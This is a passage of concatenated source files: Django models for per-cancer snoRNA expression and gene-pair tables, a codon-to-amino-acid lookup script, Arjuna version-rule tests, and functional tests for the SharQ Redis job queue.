rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_STAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_TGCT(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_THCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_THYM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_UCEC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_UCS(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class protein_expression_UVM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
    protein = models.CharField(max_length=225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
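With one model class per cancer type, view code typically needs to map a cancer-code string to the right class. A minimal, framework-free sketch of that dispatch follows (the two stand-in classes and the `protein_expression_model` helper are illustrative, not part of this app; in the real project the registry values would be the Django model classes defined above):

```python
class protein_expression_ACC:   # stand-in for the Django model above
    pass

class protein_expression_BLCA:  # stand-in for the Django model above
    pass

# Registry mapping TCGA cancer codes to their per-cancer model class.
PROTEIN_EXPRESSION_MODELS = {
    "ACC": protein_expression_ACC,
    "BLCA": protein_expression_BLCA,
}

def protein_expression_model(cancer):
    """Return the model class for a cancer code such as 'ACC' or 'blca'."""
    try:
        return PROTEIN_EXPRESSION_MODELS[cancer.upper()]
    except KeyError:
        raise ValueError(f"no protein_expression model for {cancer!r}") from None
```

A single dictionary lookup like this replaces a long `if`/`elif` chain over cancer types and raises a clear error for unknown codes.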
# gene-snoRNA pairs: one table per TCGA cancer type
class gene_snorna_pair_ACC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_BLCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
class gene_snorna_pair_BRCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
    dataset_id = models.CharField(max_length=225, null=True)
    gene_symbol = models.CharField(max_length=225)

    def __str__(self):
        return self.snorna


# The per-cancer-type pair tables below all share the same three fields,
# so the common shape lives on one abstract base model; each concrete
# subclass still gets its own database table.
class GeneSnornaPairBase(models.Model):
    snorna = models.CharField(max_length=225, null=True)
    dataset_id = models.CharField(max_length=225, null=True)
    gene_symbol = models.CharField(max_length=225)

    class Meta:
        abstract = True

    def __str__(self):
        return self.snorna


class gene_snorna_pair_CESC(GeneSnornaPairBase):
    pass

class gene_snorna_pair_CHOL(GeneSnornaPairBase):
    pass

class gene_snorna_pair_COAD(GeneSnornaPairBase):
    pass

class gene_snorna_pair_DLBC(GeneSnornaPairBase):
    pass

class gene_snorna_pair_ESCA(GeneSnornaPairBase):
    pass

class gene_snorna_pair_HNSC(GeneSnornaPairBase):
    pass

class gene_snorna_pair_KICH(GeneSnornaPairBase):
    pass

class gene_snorna_pair_KIRC(GeneSnornaPairBase):
    pass

class gene_snorna_pair_KIRP(GeneSnornaPairBase):
    pass

class gene_snorna_pair_LGG(GeneSnornaPairBase):
    pass

class gene_snorna_pair_LIHC(GeneSnornaPairBase):
    pass

class gene_snorna_pair_LUAD(GeneSnornaPairBase):
    pass

class gene_snorna_pair_LUSC(GeneSnornaPairBase):
    pass

class gene_snorna_pair_MESO(GeneSnornaPairBase):
    pass

class gene_snorna_pair_OV(GeneSnornaPairBase):
    pass

class gene_snorna_pair_PAAD(GeneSnornaPairBase):
    pass

class gene_snorna_pair_PCPG(GeneSnornaPairBase):
    pass

class gene_snorna_pair_PRAD(GeneSnornaPairBase):
    pass

class gene_snorna_pair_READ(GeneSnornaPairBase):
    pass

class gene_snorna_pair_SARC(GeneSnornaPairBase):
    pass

class gene_snorna_pair_SKCM(GeneSnornaPairBase):
    pass

class gene_snorna_pair_STAD(GeneSnornaPairBase):
    pass

class gene_snorna_pair_TGCT(GeneSnornaPairBase):
    pass

class gene_snorna_pair_THCA(GeneSnornaPairBase):
    pass

class gene_snorna_pair_THYM(GeneSnornaPairBase):
    pass

class gene_snorna_pair_UCEC(GeneSnornaPairBase):
    pass

class gene_snorna_pair_UCS(GeneSnornaPairBase):
    pass

class gene_snorna_pair_UVM(GeneSnornaPairBase):
    pass
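# The concrete pair models differ only in their TCGA cohort suffix, so code
# that needs "the table for cohort X" can build the model name generically.
# A minimal sketch (not part of the original models file); resolving the name
# to a class would use Django's app registry inside a configured project, and
# the app label shown in the comment is an assumption:

```python
def pair_model_name(cohort):
    """Build the per-cohort model name, e.g. 'luad' -> 'gene_snorna_pair_LUAD'."""
    return "gene_snorna_pair_%s" % cohort.upper()

# Inside a configured Django project (hypothetical app label "app_name"):
#   from django.apps import apps
#   model = apps.get_model("app_name", pair_model_name("luad"))
#   rows = model.objects.filter(gene_symbol="TP53")
```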
# for RNA splicing
# === src/chain_handling.py (JanColon/Amino-Acid-Finder, MIT) ===
from main import nc_out
import acid_combos_rna
import acid_combos_dna

purgatory = False

## Compares the user input to every codon table in 'acid_combos_rna.py' ##
## and 'acid_combos_dna.py', printing the associated amino acid.        ##
# Attribute name in the acid_combos modules -> amino-acid name; STR and
# STP mark the initiation and termination codon lists.
ACID_NAMES = {
    'F': 'Phenylalanine', 'L': 'Leucine', 'I': 'Isoleucine',
    'M': 'Methionine', 'V': 'Valine', 'S': 'Serine',
    'P': 'Proline', 'T': 'Threonine', 'A': 'Alanine',
    'Y': 'Tyrosine', 'H': 'Histidine', 'Q': 'Glutamine',
    'N': 'Asparagine', 'K': 'Lysine', 'D': 'Aspartic acid',
    'E': 'Glutamic acid', 'C': 'Cysteine', 'W': 'Tryptophan',
    'R': 'Arginine', 'G': 'Glycine',
    'STR': 'Initiation', 'STP': 'Termination',
}

for module in (acid_combos_rna, acid_combos_dna):
    for attr, name in ACID_NAMES.items():
        for i in getattr(module, attr):
            if i == nc_out:
                print(name)
                purgatory = True

## Prevents program from closing ##
while purgatory:
    input()
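# The script above is, in essence, a table lookup from codon to amino-acid
# name. A self-contained sketch of the same idea as a reusable function; the
# codon lists here are a small illustrative subset, not the project's full
# acid_combos tables:

```python
# Amino-acid name -> illustrative RNA codons (subset only).
AMINO_ACIDS = {
    "Phenylalanine": ["UUU", "UUC"],
    "Methionine": ["AUG"],
    "Termination": ["UAA", "UAG", "UGA"],
}

def find_amino_acid(codon):
    """Return the amino-acid name for a codon, or None if unknown."""
    for name, codons in AMINO_ACIDS.items():
        if codon in codons:
            return name
    return None
```

A dict keyed directly by codon would make the lookup O(1), but the shape above mirrors the per-acid lists the original modules use.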
# === arjuna-samples/arjex/test/pkg/rules/check_rules_05_app_ver.py (StefanIGit/arjuna, Apache-2.0) ===
# This file is a part of Arjuna
# Copyright 2015-2021 Rahul Verma
# Website: www.RahulVerma.net
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from arjuna import *
from arjuna.engine.selection.selector import Selector
from arjuna.core.constant import *
from .helpers import *
@test
def check_rule_creation_str_prop_comp(request):
    # Every supported comparison spelling for the app_version attribute:
    # (rule string, parsed condition, expression, checker function name).
    cases = [
        ("app_version is 2.1.1", RuleConditionType.EQUAL, "2.1.1", "are_equal"),
        ("app_version eq 2.1.1", RuleConditionType.EQUAL, "2.1.1", "are_equal"),
        ("app_version = 2.1.1", RuleConditionType.EQUAL, "2.1.1", "are_equal"),
        ("app_version == 2.1.1", RuleConditionType.EQUAL, "2.1.1", "are_equal"),
        ("app_version not 2.1.2", RuleConditionType.NOT_EQUAL, "2.1.2", "are_not_equal"),
        ("app_version != 2.1.2", RuleConditionType.NOT_EQUAL, "2.1.2", "are_not_equal"),
        ("app_version ne 2.1.2", RuleConditionType.NOT_EQUAL, "2.1.2", "are_not_equal"),
        ("app_version lt 2.1.2", RuleConditionType.LESS_THAN, "2.1.2", "less_than"),
        ("app_version < 2.1.2", RuleConditionType.LESS_THAN, "2.1.2", "less_than"),
        ("app_version gt 2.1.0", RuleConditionType.GREATER_THAN, "2.1.0", "greater_than"),
        ("app_version > 2.1.0", RuleConditionType.GREATER_THAN, "2.1.0", "greater_than"),
        ("app_version le 2.1.1", RuleConditionType.LESS_OR_EQUAL, "2.1.1", "less_or_equal"),
        ("app_version <= 2.1.1", RuleConditionType.LESS_OR_EQUAL, "2.1.1", "less_or_equal"),
        ("app_version ge 2.1.1", RuleConditionType.GREATER_OR_EQUAL, "2.1.1", "greater_or_equal"),
        ("app_version >= 2.1.1", RuleConditionType.GREATER_OR_EQUAL, "2.1.1", "greater_or_equal"),
    ]
    for r, condition, expression, checker_name in cases:
        selector = Selector()
        selector.include(r)
        rule = selector.irules[0]
        print(rule)
        assert rule.__class__.__name__ == "AttrPatternRule"
        assert rule.rule_str == r
        assert rule.container == "info"
        assert rule.target == "app_version"
        assert rule.condition == condition
        assert rule.expression == expression
        assert rule.checker.__name__ == checker_name
@test
def check_str_comp_selection(request):
    # (rule string, {app_version value (None = attribute unset): expected}).
    cases = [
        ("app_version is 2.1.1", {None: False, "2.1.1": True, "2.1.2": False}),
        ("app_version not 2.1.2", {None: True, "2.1.1": True, "2.1.2": False}),
        ("app_version lt 2.1.2", {None: True, "2.1.3": False, "2.1.2": False}),
        ("app_version gt 2.1.2", {None: False, "2.1.3": True, "2.1.2": False}),
        ("app_version le 2.1.2", {None: True, "2.1.1": True, "2.1.2": True, "2.1.3": False}),
        ("app_version ge 2.1.2", {None: False, "2.1.3": True, "2.1.2": True, "2.1.1": False}),
    ]
    for rule_str, expectations in cases:
        rule = get_rule(rule_str)
        for app_version, expected in expectations.items():
            obj = Obj()
            if app_version is not None:
                obj.info.app_version = app_version
            assert rule.matches(obj) is expected
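# The selection rules above compare dotted version strings. A general-purpose
# comparison of such strings usually converts them to integer tuples first,
# because plain string ordering mishandles multi-digit components (lexically
# "2.10.0" < "2.9.0"). A standalone sketch of that conversion — not Arjuna's
# own implementation:

```python
def version_key(version):
    """Turn '2.10.0' into (2, 10, 0) so comparisons are numeric."""
    return tuple(int(part) for part in version.split("."))

assert "2.10.0" < "2.9.0"                            # string compare: misleading
assert version_key("2.10.0") > version_key("2.9.0")  # tuple compare: correct
```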
# === tests/test_func.py (bhuvanvenkat-plivo/sharq, MIT) ===
# -*- coding: utf-8 -*-
# Copyright (c) 2014 Plivo Team. See LICENSE.txt for details.
import os
import uuid
import time
import math
import unittest

import msgpack

from sharq import SharQ
from sharq.utils import generate_epoch


class SharQTestCase(unittest.TestCase):
    """
    `SharQTestCase` contains the functional test cases
    that validate the correctness of all the APIs exposed
    by SharQ.
    """

    def setUp(self):
        cwd = os.path.dirname(os.path.realpath(__file__))
        config_path = os.path.join(cwd, 'sharq.test.conf')  # test config
        self.queue = SharQ(config_path)
        # flush all the keys in the test db before starting test
        self.queue._r.flushdb()

        # test specific values
        self._test_queue_id = 'johndoe'
        self._test_queue_type = 'sms'
        self._test_payload_1 = {
            'to': '1000000000',
            'message': 'Hello, world'
        }
        self._test_payload_2 = {
            'to': '1000000001',
            'message': 'Hello, SharQ'
        }
        self._test_requeue_limit_5 = 5
        self._test_requeue_limit_neg_1 = -1
        self._test_requeue_limit_0 = 0

        self._test2_queue_id = 'thetourist'
        self._test2_queue_type = 'package'

    def _get_job_id(self):
        """Generates a uuid4 and returns the string
        representation of it.
        """
        return str(uuid.uuid4())

    def _enqueue(self, payload=None, interval=10000, **kwargs):
        """Enqueues a job with the common test defaults
        (10s interval, test queue id/type) and returns the
        (job_id, response) pair.
        """
        job_id = self._get_job_id()
        response = self.queue.enqueue(
            payload=payload or self._test_payload_1,
            interval=interval,
            job_id=job_id,
            queue_id=self._test_queue_id,
            queue_type=self._test_queue_type,
            **kwargs
        )
        return job_id, response

    def _queue_name(self):
        """Returns the redis key of the test job queue."""
        return '%s:%s:%s' % (
            self.queue._key_prefix,
            self._test_queue_type,
            self._test_queue_id
        )

    def _requeue_limit_map_name(self):
        """Returns the redis key of the requeues-remaining map."""
        return '%s:%s:%s:requeues_remaining' % (
            self.queue._key_prefix,
            self._test_queue_type,
            self._test_queue_id
        )

    def test_enqueue_response_status(self):
        job_id, response = self._enqueue()
        self.assertEqual(response['status'], 'queued')

    def test_enqueue_job_queue_existence(self):
        job_id, response = self._enqueue()
        # check if the job queue exists
        self.assertTrue(self.queue._r.exists(self._queue_name()))

    def test_enqueue_job_existence_in_job_queue(self):
        job_id, response = self._enqueue()
        # check if the queue contains the job we just pushed (by peeking)
        latest_job_id = self.queue._r.lrange(self._queue_name(), -1, -1)
        self.assertEqual(latest_job_id, [job_id])

    def test_enqueue_job_queue_length(self):
        job_id, response = self._enqueue()
        # check if the queue length is one
        self.assertEqual(self.queue._r.llen(self._queue_name()), 1)

    def test_enqueue_payload_dump(self):
        job_id, response = self._enqueue()
        # check if the payload is saved in the appropriate structure
        payload_map_name = '%s:payload' % (self.queue._key_prefix)
        # check if the payload map exists
        self.assertTrue(self.queue._r.exists(payload_map_name))

    def test_enqueue_payload_encode_decode(self):
        job_id, response = self._enqueue()
        payload_map_name = '%s:payload' % (self.queue._key_prefix)
        payload_map_key = '%s:%s:%s' % (
            self._test_queue_type, self._test_queue_id, job_id)
        raw_payload = self.queue._r.hget(payload_map_name, payload_map_key)
        # decode the payload from msgpack to dictionary
        payload = msgpack.unpackb(raw_payload[1:-1])
        self.assertEqual(payload, self._test_payload_1)

    def test_enqueue_interval_map_existence(self):
        job_id, response = self._enqueue()
        # check if interval is saved in the appropriate structure
        interval_map_name = '%s:interval' % (self.queue._key_prefix)
        # check if interval map exists
        self.assertTrue(self.queue._r.exists(interval_map_name))

    def test_enqueue_interval_value(self):
        job_id, response = self._enqueue()
        interval_map_name = '%s:interval' % (self.queue._key_prefix)
        interval_map_key = '%s:%s' % (
            self._test_queue_type, self._test_queue_id)
        interval = self.queue._r.hget(
            interval_map_name, interval_map_key)
        self.assertEqual(interval, '10000')  # 10s (10000ms)

    def test_enqueue_requeue_limit_map_existence(self):
        # without a requeue limit parameter
        job_id, response = self._enqueue()
        # check if requeue limit is saved in the appropriate structure
        self.assertTrue(
            self.queue._r.exists(self._requeue_limit_map_name()))

        # with an explicit requeue limit
        job_id, response = self._enqueue(
            requeue_limit=self._test_requeue_limit_5)
        self.assertTrue(
            self.queue._r.exists(self._requeue_limit_map_name()))

    def test_enqueue_requeue_limit_value(self):
        # without requeue limit (but reading from the config)
        job_id, response = self._enqueue()
        requeues_remaining = self.queue._r.hget(
            self._requeue_limit_map_name(), job_id)
        self.assertEqual(requeues_remaining, '-1')  # from the config file.

        # with requeue limit in the enqueue function.
        job_id, response = self._enqueue(
            requeue_limit=self._test_requeue_limit_5)
        requeues_remaining = self.queue._r.hget(
            self._requeue_limit_map_name(), job_id)
        self.assertEqual(requeues_remaining, '5')  # 5 requeues remaining.

    def test_enqueue_ready_set(self):
        job_id, response = self._enqueue()
        sorted_set_name = '%s:%s' % (
            self.queue._key_prefix, self._test_queue_type)
        self.assertTrue(self.queue._r.exists(sorted_set_name))

    def test_enqueue_ready_set_contents(self):
        start_time = str(generate_epoch())
        job_id, response = self._enqueue()
        end_time = str(generate_epoch())
        sorted_set_name = '%s:%s' % (
            self.queue._key_prefix, self._test_queue_type)
        queue_id_list = self.queue._r.zrangebyscore(
            sorted_set_name,
            start_time,
            end_time)
        # check if exactly one item in the list
        self.assertEqual(len(queue_id_list), 1)
        # check the value to match the queue_id
        self.assertEqual(queue_id_list[0], self._test_queue_id)

    def test_enqueue_queue_type_ready_set(self):
        job_id, response = self._enqueue()
        # check the queue type ready set.
        queue_type_ready_set = self.queue._r.smembers(
            '%s:ready:queue_type' % self.queue._key_prefix)
        self.assertEqual(len(queue_type_ready_set), 1)
        self.assertEqual(queue_type_ready_set.pop(), self._test_queue_type)

    def test_enqueue_queue_type_active_set(self):
        job_id, response = self._enqueue()
        queue_type_active_set = self.queue._r.smembers(
            '%s:active:queue_type' % self.queue._key_prefix)
        self.assertEqual(len(queue_type_active_set), 0)

    def test_enqueue_metrics_global_enqueue_counter(self):
        job_id, response = self._enqueue()
        timestamp = int(generate_epoch())
        # epoch for the minute.
        timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
        counter_value = self.queue._r.get('%s:enqueue_counter:%s' % (
            self.queue._key_prefix, timestamp_minute))
        self.assertEqual(counter_value, '1')

    def test_enqueue_metrics_per_queue_enqueue_counter(self):
        job_id, response = self._enqueue()
        response = self.queue.dequeue(
            queue_type=self._test_queue_type
        )
        timestamp = int(generate_epoch())
        # epoch for the minute.
        timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
        counter_value = self.queue._r.get('%s:%s:%s:enqueue_counter:%s' % (
            self.queue._key_prefix,
            self._test_queue_type,
            self._test_queue_id,
            timestamp_minute))
        self.assertEqual(counter_value, '1')

    def test_enqueue_second_job_status(self):
        # job 1
        self._enqueue()
        # job 2
        job_id, response = self._enqueue(
            payload=self._test_payload_2,
            interval=20000)  # 20s (20000ms)
        self.assertEqual(response['status'], 'queued')

    def test_enqueue_second_job_queue_existence(self):
        # job 1
        self._enqueue()
        # job 2
        self._enqueue(payload=self._test_payload_2, interval=20000)
        self.assertTrue(self.queue._r.exists(self._queue_name()))

    def test_enqueue_second_job_existence_in_job_queue(self):
        # job 1
        self._enqueue()
        # job 2
        job_id, response = self._enqueue(
            payload=self._test_payload_2, interval=20000)
        latest_job_id = self.queue._r.lrange(self._queue_name(), -1, -1)
        self.assertEqual(latest_job_id, [job_id])

    def test_enqueue_second_job_queue_length(self):
        # job 1
        self._enqueue()
        # job 2
        self._enqueue(payload=self._test_payload_2, interval=20000)
        # check if the queue length is two
        self.assertEqual(self.queue._r.llen(self._queue_name()), 2)

    def test_enqueue_second_job_payload_dump(self):
        # job 1
        self._enqueue()
        # job 2
        job_id, response = self._enqueue(
            payload=self._test_payload_2, interval=20000)
        payload_map_name = '%s:payload' % (self.queue._key_prefix)
# check if the payload map exists
self.assertTrue(self.queue._r.exists(payload_map_name))
def test_enqueue_second_job_payload_encode_decode(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# job 2
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
payload_map_name = '%s:payload' % (self.queue._key_prefix)
payload_map_key = '%s:%s:%s' % (
self._test_queue_type, self._test_queue_id, job_id)
raw_payload = self.queue._r.hget(payload_map_name, payload_map_key)
# decode the payload from msgpack to dictionary
payload = msgpack.unpackb(raw_payload[1:-1])
self.assertEqual(payload, self._test_payload_2)
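The payload lookups above all follow one key-layout convention: a single hash holds every payload, keyed per job. A minimal sketch of that layout, with hypothetical helper names (they are not part of the library API; the key formats are taken from the assertions in these tests):

```python
def payload_map_name(prefix):
    # One hash per deployment holds all job payloads.
    return '%s:payload' % prefix

def payload_map_key(queue_type, queue_id, job_id):
    # Hash field identifying a single job's payload.
    return '%s:%s:%s' % (queue_type, queue_id, job_id)

print(payload_map_key('sms', 'queue1', 'job42'))  # -> sms:queue1:job42
```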
def test_enqueue_second_job_interval_map_existence(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# job 2
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
interval_map_name = '%s:interval' % (self.queue._key_prefix)
# check if interval map exists
self.assertTrue(self.queue._r.exists(interval_map_name))
def test_enqueue_second_job_interval_value(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# job 2
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
interval_map_name = '%s:interval' % (self.queue._key_prefix)
interval_map_key = '%s:%s' % (
self._test_queue_type, self._test_queue_id)
interval = self.queue._r.hget(interval_map_name, interval_map_key)
self.assertEqual(interval, '20000') # 20s (20000ms)
def test_enqueue_second_job_ready_set(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# job 2
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
sorted_set_name = '%s:%s' % (
self.queue._key_prefix, self._test_queue_type)
self.assertTrue(self.queue._r.exists(sorted_set_name))
def test_enqueue_second_job_ready_set_contents(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# sleeping for 500ms to ensure that the
# time difference between two enqueues is
# measurable for the test cases.
time.sleep(0.5)
# job 2
job_id = self._get_job_id()
start_time = str(generate_epoch())
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
sorted_set_name = '%s:%s' % (
self.queue._key_prefix, self._test_queue_type)
end_time = str(generate_epoch())
queue_id_list = self.queue._r.zrangebyscore(
sorted_set_name,
start_time,
end_time)
self.assertEqual(len(queue_id_list), 0)
def test_enqueue_second_job_queue_type_ready_set(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# job 2
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# check the queue type ready set.
queue_type_ready_set = self.queue._r.smembers(
'%s:ready:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_ready_set), 1)
self.assertEqual(queue_type_ready_set.pop(), self._test_queue_type)
def test_enqueue_second_job_queue_type_active_set(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# job 2
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# the active queue type set should be empty before any dequeue
queue_type_active_set = self.queue._r.smembers(
'%s:active:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_active_set), 0)
def test_dequeue_response_status_failure(self):
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(response['status'], 'failure')
def test_dequeue_response_status_success_without_requeue_limit(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
# without requeue limit
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# check all the responses
self.assertEqual(response['status'], 'success')
self.assertEqual(response['queue_id'], self._test_queue_id)
self.assertEqual(response['job_id'], job_id)
self.assertEqual(response['payload'], self._test_payload_1)
self.assertEqual(response['requeues_remaining'], -1) # from the config
def test_dequeue_response_status_success_with_requeue_limit(self):
# with requeue limit passed explicitly
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
requeue_limit=self._test_requeue_limit_5
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# check all the responses
self.assertEqual(response['status'], 'success')
self.assertEqual(response['queue_id'], self._test_queue_id)
self.assertEqual(response['job_id'], job_id)
self.assertEqual(response['payload'], self._test_payload_1)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_5)
def test_dequeue_job_queue_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
queue_name = '%s:%s:%s' % (
self.queue._key_prefix, self._test_queue_type, self._test_queue_id)
self.assertFalse(self.queue._r.exists(queue_name))
def test_dequeue_time_keeper_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# time keeper key should exist
time_keeper_key_name = '%s:%s:%s:time' % (
self.queue._key_prefix,
self._test_queue_type, self._test_queue_id
)
self.assertTrue(self.queue._r.exists(time_keeper_key_name))
def test_dequeue_ready_sorted_set_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# the ready sorted set should no longer exist
sorted_set_name = '%s:%s' % (
self.queue._key_prefix, self._test_queue_type)
self.assertFalse(self.queue._r.exists(sorted_set_name))
def test_dequeue_active_sorted_set(self):
job_id = self._get_job_id()
start_time = str(generate_epoch())
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# the job should exist in the active set with the timestamp
# it was picked up with.
active_sorted_set_name = '%s:%s:active' % (
self.queue._key_prefix,
self._test_queue_type
)
end_time = str(generate_epoch())
job_expire_timestamp = str(
int(end_time) + self.queue._job_expire_interval)
job_id_list = self.queue._r.zrangebyscore(
active_sorted_set_name,
start_time,
job_expire_timestamp)
# check if there is exactly one job in the
# active sorted set
self.assertEqual(len(job_id_list), 1)
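The score range queried above can be reproduced in isolation. A sketch, assuming epochs and `_job_expire_interval` are both in milliseconds (as the rest of these tests imply): a dequeued job is scored in the active sorted set by the time it will expire, so the window runs from the pickup time to pickup plus the expiry interval.

```python
def expiry_window(dequeue_epoch_ms, job_expire_interval_ms):
    # (low, high) score bounds for finding a job dequeued at
    # dequeue_epoch_ms in the active sorted set.
    return dequeue_epoch_ms, dequeue_epoch_ms + job_expire_interval_ms

low, high = expiry_window(1000000, 1000)
print(low, high)  # -> 1000000 1001000
```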
def test_dequeue_time_keeper_expiry(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=1000, # 1s (1000ms)
job_id=job_id,
queue_id=self._test_queue_id,
